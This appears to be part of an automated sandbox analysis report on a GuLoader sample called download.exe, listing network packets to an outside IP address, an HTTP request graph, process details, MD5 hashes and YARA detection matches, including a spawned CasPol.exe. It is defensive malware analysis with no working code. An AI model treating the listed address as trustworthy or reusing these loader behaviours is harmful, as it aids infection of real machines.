              Mar 20, 2023 13:17:27.240505934 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.312999010 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.319519997 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.319586039 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.319698095 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.319760084 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.336045980 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.336110115 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.336155891 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:27.336225986 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:27.336298943 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:32.872137070 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:32.872304916 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.344167948 CET4980180192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.344499111 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.362550020 CET804980137.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.362641096 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.362831116 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.362966061 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.437429905 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.437498093 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.437544107 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.437587023 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.437632084 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:37.437645912 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.437716961 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.437817097 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:37.437818050 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:42.944545031 CET804980437.139.128.83192.168.11.20
              Mar 20, 2023 13:17:42.945274115 CET4980480192.168.11.2037.139.128.83
              Mar 20, 2023 13:17:47.451338053 CET4980480192.168.11.2037.139.128.83

              HTTP Request Dependency Graph

              • 37.139.128.83

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:2
              Start time:13:15:59
              Start date:20/03/2023
              Path:C:\Users\user\Desktop\download.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\download.exe
              Imagebase:0x400000
              File size:680560 bytes
              MD5 hash:064FA36DA0C2CA360B0906CC5BFE67C6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              General

              Target ID:4
              Start time:13:16:37
              Start date:20/03/2023
              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\download.exe
              Imagebase:0x10000
              File size:106496 bytes
              MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate

              General

              Target ID:5
              Start time:13:16:37
              Start date:20/03/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7d7f70000
              File size:875008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              No disassembly